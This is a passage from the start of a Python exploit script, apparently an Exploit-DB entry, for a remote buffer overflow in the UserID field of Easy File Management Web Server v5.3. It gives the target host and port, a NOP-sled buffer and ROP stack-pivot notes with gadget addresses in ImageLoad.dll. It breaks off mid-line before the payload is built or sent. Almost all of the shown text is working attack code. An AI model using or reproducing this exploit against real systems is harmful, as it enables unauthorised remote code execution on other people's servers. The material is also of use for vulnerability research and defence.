#!/usr/bin/python # Exploit Title: Easy File Management Web Server v5.3 - USERID Remote Buffer Overflow (ROP) # Version: 5.3 # Date: 2014-05-31 # Author: Julien Ahrens (@MrTuxracer) # Homepage: http://www.rcesecurity.com # Software Link: http://www.efssoft.com/ # Tested on: WinXP-GER, Win7x64-GER, Win8-EN, Win8x64-GER # # Credits for vulnerability discovery: # superkojiman (http://www.exploit-db.com/exploits/33453/) # # Howto / Notes: # This script exploits the buffer overflow vulnerability caused by an oversized UserID string, as # discovered by superkojiman. In comparison to superkojiman's exploit, this exploit does not # brute force the address of the overwritten stack part; instead, it uses code from its own # .text segment to achieve reliable code execution. from struct import pack import socket,sys import os host="192.168.0.1" port=80 junk0 = "\x90" * 80 # Instead of bruteforcing the stack address, let's take an address # from the .text segment, which is near the stack pivot instruction: # 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll] # The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job! # Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8 call_edx=pack('